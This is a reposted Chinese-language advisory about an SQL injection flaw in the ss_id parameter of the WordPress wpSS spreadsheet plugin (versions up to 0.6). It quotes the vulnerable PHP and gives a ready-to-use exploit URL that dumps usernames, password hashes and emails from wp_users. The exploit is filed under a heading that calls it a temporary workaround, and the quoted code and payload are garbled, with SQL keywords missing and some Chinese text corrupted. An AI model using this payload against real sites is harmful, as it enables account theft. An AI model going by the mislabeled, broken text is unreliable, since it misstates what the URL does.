Art Hacker
We advocate freedom, equality, sharing and mutual aid

WordPress wpSS插件ss_id参数SQL注入漏洞

受影响系统：
WordPress wpSS <= 0.6 v
不受影响系统：
WordPress wpSS 0.62
描述：
——————————————————————————–
BUGTRAQ ID: 28894

wpSS是WordPress中所使用的电子表格插件，允许在WordPress博客中嵌入交互式的电子表格。

wpSS插件的wpSS/ss_load.php文件中没有正确地过滤对ss_id参数的数便用在了SQL查询中：

ss_load.php
$id = $_GET[′ss_id′];
….
ss_functions.php:
function ss_load ($id, $plain=FALSE) {
….
if ($wpdb->query(”CT * $table_name id=′$id′”) == 0) {
….

这允许远程攻击者通过注入任意SQL代码操控SQL查询，导致执行任意代码。

<*来源：1ten0.0net1

链接：http://secunia.com/advisories/29938/
*>

建议：
——————————————————————————–
临时解决方法：

http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+ct+1,concat(user_login,0×3a,user_pass,0×3a,user_email),3,4++wp_users–&display=plain

厂商补丁：
———
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://timrohrer.com/blog/?page_id=71

Related Posts Preference

• 2008-05-02 -- WordPress Cookie完整性保护非授权访问漏洞 (0)
• 2008-07-23 -- Velocity安全管理系统HTTP服务器目录遍历漏洞 (0)
• 2008-07-20 -- WordPress Theme - Firebug (0)
• 2008-06-26 -- 警告:发现苹果Mac OS X漏洞的木马 (0)
• 2008-06-25 -- TMSNC UBX消息远程栈溢出漏洞 (0)
• 2008-06-25 -- Perl rmtree()函数本地不安全权限漏洞 (0)
• 2008-06-25 -- Apple Safari自动启动可执行程序漏洞 (0)
• 2008-06-25 -- XnView产品TAAC文件解析栈溢出漏洞 (0)
• 2008-06-23 -- TYPO3多个扩展跨站脚本及SQL注入漏洞 (0)
• 2008-06-23 -- UltraEdit FTP/SFTP LIST命令目录遍历漏洞 (0)